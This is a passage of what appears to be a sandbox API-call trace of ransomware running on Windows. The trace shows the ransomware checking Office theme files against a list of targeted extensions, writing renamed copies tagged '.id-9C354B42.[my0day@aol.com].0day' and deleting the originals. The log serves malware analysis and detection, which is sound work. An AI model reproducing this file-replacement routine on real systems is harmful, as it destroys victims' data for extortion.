SetEndOfFile (hFile=0x2cc) returned 1 [0272.577] CloseHandle (hObject=0x2cc) returned 1 [0272.577] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0272.577] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\clarity.eftx")) returned 1 [0272.577] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx") returned 79 [0272.577] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx") returned 79 [0272.577] lstrlenW (lpString=".doc") returned 4 [0272.577] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0272.577] lstrlenW (lpString=".docx") returned 5 [0272.577] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0272.577] lstrlenW (lpString=".pdf") returned 4 [0272.577] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0272.577] lstrlenW (lpString=".xls") returned 4 [0272.577] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0272.577] lstrlenW (lpString=".xlsx") returned 5 [0272.577] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0272.577] lstrlenW (lpString=".ppt") returned 4 [0272.577] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0272.577] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx") returned 79 [0272.577] lstrlenW (lpString=".zip") returned 4 [0272.577] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0272.577] lstrlenW (lpString=".rar") returned 4 [0272.578] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0272.578] lstrlenW (lpString=".bz2") returned 4 [0272.578] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0272.578] lstrlenW (lpString=".7z") returned 3 [0272.578] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0272.578] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx") returned 79 [0272.578] lstrlenW (lpString=".dbf") returned 4 [0272.578] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0272.578] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx") returned 79 [0272.578] lstrlenW (lpString=".1cd") returned 4 [0272.578] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0272.578] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx") returned 79 [0272.578] lstrlenW (lpString=".jpg") returned 4 [0272.578] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0272.578] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx") returned 79 [0272.578] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx") returned 79 [0272.578] lstrlenW (lpString=".doc") returned 4 [0272.578] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0272.578] lstrlenW (lpString=".docx") returned 5 [0272.578] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0272.578] lstrlenW (lpString=".pdf") returned 4 [0272.578] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0272.578] lstrlenW (lpString=".xls") returned 4 [0272.578] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0272.578] lstrlenW (lpString=".xlsx") returned 5 [0272.578] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0272.578] lstrlenW (lpString=".ppt") returned 4 [0272.578] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0272.578] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx") returned 79 [0272.578] lstrlenW (lpString=".zip") returned 4 [0272.578] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0272.578] lstrlenW (lpString=".rar") returned 4 [0272.578] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0272.578] lstrlenW (lpString=".bz2") returned 4 [0272.579] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0272.579] lstrlenW (lpString=".7z") returned 3 [0272.579] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0272.579] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx") returned 79 [0272.579] lstrlenW (lpString=".dbf") returned 4 [0272.579] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0272.579] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx") returned 79 [0272.579] lstrlenW (lpString=".1cd") returned 4 [0272.579] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0272.579] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx") returned 79 [0272.579] lstrlenW (lpString=".jpg") returned 4 [0272.579] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0272.579] lstrcmpiW (lpString1=".eftx", lpString2=".0day") returned 1 [0272.579] lstrlenW (lpString="Composite.eftx") returned 14 [0272.579] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\composite.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0272.580] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x3b9ff1c | out: lpFileSize=0x3b9ff1c*=533988) returned 1 [0272.580] CloseHandle (hObject=0x2cc) returned 1 [0272.580] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\composite.eftx")) returned 0x20 [0272.580] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\composite.eftx.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0272.580] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\composite.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0272.768] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.768] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.768] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\composite.eftx.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0272.904] GetLastError () returned 0x0 [0272.904] ReadFile (in: hFile=0x2cc, lpBuffer=0x43f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fed4, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesRead=0x3b9fed4*=0x825e4, lpOverlapped=0x0) returned 1 [0272.937] WriteFile (in: hFile=0x2c4, lpBuffer=0x43f0020*, nNumberOfBytesToWrite=0x825f0, lpNumberOfBytesWritten=0x3b9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesWritten=0x3b9fc9c*=0x825f0, lpOverlapped=0x0) returned 1 [0272.948] ReadFile (in: hFile=0x2cc, lpBuffer=0x43f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fed4, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesRead=0x3b9fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.948] WriteFile (in: hFile=0x2c4, lpBuffer=0x43f0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x3b9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesWritten=0x3b9fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0272.949] SetEndOfFile (hFile=0x2c4) returned 1 [0272.949] CloseHandle (hObject=0x2c4) returned 1 [0272.949] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.949] SetEndOfFile (hFile=0x2cc) returned 1 [0272.963] CloseHandle (hObject=0x2cc) returned 1 [0272.963] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0273.068] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\composite.eftx")) returned 1 [0273.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx") returned 81 [0273.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx") returned 81 [0273.114] lstrlenW (lpString=".doc") returned 4 [0273.114] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0273.114] lstrlenW (lpString=".docx") returned 5 [0273.114] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0273.114] lstrlenW (lpString=".pdf") returned 4 [0273.114] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0273.114] lstrlenW (lpString=".xls") returned 4 [0273.114] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0273.114] lstrlenW (lpString=".xlsx") returned 5 [0273.114] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0273.114] lstrlenW (lpString=".ppt") returned 4 [0273.114] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0273.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx") returned 81 [0273.114] lstrlenW (lpString=".zip") returned 4 [0273.114] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0273.114] lstrlenW (lpString=".rar") returned 4 [0273.114] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0273.114] lstrlenW (lpString=".bz2") returned 4 [0273.114] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0273.114] lstrlenW (lpString=".7z") returned 3 [0273.114] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0273.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx") returned 81 [0273.114] lstrlenW (lpString=".dbf") returned 4 [0273.114] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0273.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx") returned 81 [0273.114] lstrlenW (lpString=".1cd") returned 4 [0273.114] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0273.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx") returned 81 [0273.114] lstrlenW (lpString=".jpg") returned 4 [0273.115] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0273.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx") returned 81 [0273.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx") returned 81 [0273.115] lstrlenW (lpString=".doc") returned 4 [0273.115] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0273.115] lstrlenW (lpString=".docx") returned 5 [0273.115] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0273.115] lstrlenW (lpString=".pdf") returned 4 [0273.115] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0273.115] lstrlenW (lpString=".xls") returned 4 [0273.115] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0273.115] lstrlenW (lpString=".xlsx") returned 5 [0273.115] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0273.115] lstrlenW (lpString=".ppt") returned 4 [0273.115] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0273.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx") returned 81 [0273.115] lstrlenW (lpString=".zip") returned 4 [0273.115] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0273.115] lstrlenW (lpString=".rar") returned 4 [0273.115] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0273.115] lstrlenW (lpString=".bz2") returned 4 [0273.115] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0273.115] lstrlenW (lpString=".7z") returned 3 [0273.115] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0273.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx") returned 81 [0273.115] lstrlenW (lpString=".dbf") returned 4 [0273.115] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0273.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx") returned 81 [0273.115] lstrlenW (lpString=".1cd") returned 4 [0273.115] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0273.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx") returned 81 [0273.115] lstrlenW (lpString=".jpg") returned 4 [0273.115] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0273.116] lstrcmpiW (lpString1=".eftx", lpString2=".0day") returned 1 [0273.116] lstrlenW (lpString="Metro.eftx") returned 10 [0273.116] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\metro.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0273.812] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x3b9ff1c | out: lpFileSize=0x3b9ff1c*=24117) returned 1 [0273.812] CloseHandle (hObject=0x380) returned 1 [0273.812] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\metro.eftx")) returned 0x20 [0273.812] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\metro.eftx.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0273.812] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\metro.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0273.812] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.812] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.812] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\metro.eftx.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0273.813] GetLastError () returned 0x0 [0273.813] ReadFile (in: hFile=0x380, lpBuffer=0x43f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fed4, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesRead=0x3b9fed4*=0x5e35, lpOverlapped=0x0) returned 1 [0273.815] WriteFile (in: hFile=0x37c, lpBuffer=0x43f0020*, nNumberOfBytesToWrite=0x5e40, lpNumberOfBytesWritten=0x3b9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesWritten=0x3b9fc9c*=0x5e40, lpOverlapped=0x0) returned 1 [0273.816] ReadFile (in: hFile=0x380, lpBuffer=0x43f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fed4, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesRead=0x3b9fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.816] WriteFile (in: hFile=0x37c, lpBuffer=0x43f0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x3b9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesWritten=0x3b9fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0273.816] SetEndOfFile (hFile=0x37c) returned 1 [0273.816] CloseHandle (hObject=0x37c) returned 1 [0273.816] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.816] SetEndOfFile (hFile=0x380) returned 1 [0273.819] CloseHandle (hObject=0x380) returned 1 [0273.819] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0273.819] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\metro.eftx")) returned 1 [0273.819] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx") returned 77 [0273.819] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx") returned 77 [0273.819] lstrlenW (lpString=".doc") returned 4 [0273.819] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0273.819] lstrlenW (lpString=".docx") returned 5 [0273.819] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0273.819] lstrlenW (lpString=".pdf") returned 4 [0273.819] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0273.819] lstrlenW (lpString=".xls") returned 4 [0273.819] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0273.819] lstrlenW (lpString=".xlsx") returned 5 [0273.820] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0273.820] lstrlenW (lpString=".ppt") returned 4 [0273.820] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0273.820] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx") returned 77 [0273.820] lstrlenW (lpString=".zip") returned 4 [0273.820] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0273.820] lstrlenW (lpString=".rar") returned 4 [0273.820] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0273.820] lstrlenW (lpString=".bz2") returned 4 [0273.820] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0273.820] lstrlenW (lpString=".7z") returned 3 [0273.820] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0273.820] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx") returned 77 [0273.820] lstrlenW (lpString=".dbf") returned 4 [0273.820] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0273.820] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx") returned 77 [0273.820] lstrlenW (lpString=".1cd") returned 4 [0273.820] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0273.820] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx") returned 77 [0273.820] lstrlenW (lpString=".jpg") returned 4 [0273.820] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0273.820] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx") returned 77 [0273.820] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx") returned 77 [0273.820] lstrlenW (lpString=".doc") returned 4 [0273.820] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0273.820] lstrlenW (lpString=".docx") returned 5 [0273.820] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0273.820] lstrlenW (lpString=".pdf") returned 4 [0273.820] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0273.820] lstrlenW (lpString=".xls") returned 4 [0273.820] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0273.820] lstrlenW (lpString=".xlsx") returned 5 [0273.820] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0273.820] lstrlenW (lpString=".ppt") returned 4 [0273.820] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0273.820] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx") returned 77 [0273.820] lstrlenW (lpString=".zip") returned 4 [0273.821] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0273.821] lstrlenW (lpString=".rar") returned 4 [0273.821] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0273.821] lstrlenW (lpString=".bz2") returned 4 [0273.821] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0273.821] lstrlenW (lpString=".7z") returned 3 [0273.821] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0273.821] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx") returned 77 [0273.821] lstrlenW (lpString=".dbf") returned 4 [0273.821] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0273.821] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx") returned 77 [0273.821] lstrlenW (lpString=".1cd") returned 4 [0273.821] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0273.821] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx") returned 77 [0273.821] lstrlenW (lpString=".jpg") returned 4 [0273.821] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0273.821] lstrcmpiW (lpString1=".eftx", lpString2=".0day") returned 1 [0273.821] lstrlenW (lpString="Perspective.eftx") returned 16 [0273.821] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\perspective.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0273.822] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x3b9ff1c | out: lpFileSize=0x3b9ff1c*=21423) returned 1 [0273.822] CloseHandle (hObject=0x380) returned 1 [0273.822] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\perspective.eftx")) returned 0x20 [0273.822] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\perspective.eftx.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0273.822] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\perspective.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0273.822] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.822] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.822] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\perspective.eftx.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0273.823] GetLastError () returned 0x0 [0273.823] ReadFile (in: hFile=0x380, lpBuffer=0x43f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fed4, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesRead=0x3b9fed4*=0x53af, lpOverlapped=0x0) returned 1 [0273.827] WriteFile (in: hFile=0x37c, lpBuffer=0x43f0020*, nNumberOfBytesToWrite=0x53b0, lpNumberOfBytesWritten=0x3b9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesWritten=0x3b9fc9c*=0x53b0, lpOverlapped=0x0) returned 1 [0273.830] ReadFile (in: hFile=0x380, lpBuffer=0x43f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fed4, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesRead=0x3b9fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.830] WriteFile (in: hFile=0x37c, lpBuffer=0x43f0020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x3b9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesWritten=0x3b9fc9c*=0xf4, lpOverlapped=0x0) returned 1 [0273.830] SetEndOfFile (hFile=0x37c) returned 1 [0273.830] CloseHandle (hObject=0x37c) returned 1 [0273.830] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.830] SetEndOfFile (hFile=0x380) returned 1 [0273.833] CloseHandle (hObject=0x380) returned 1 [0273.833] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0273.833] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\perspective.eftx")) returned 1 [0273.833] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx") returned 83 [0273.833] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx") returned 83 [0273.833] lstrlenW (lpString=".doc") returned 4 [0273.833] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0273.833] lstrlenW (lpString=".docx") returned 5 [0273.833] lstrcmpiW 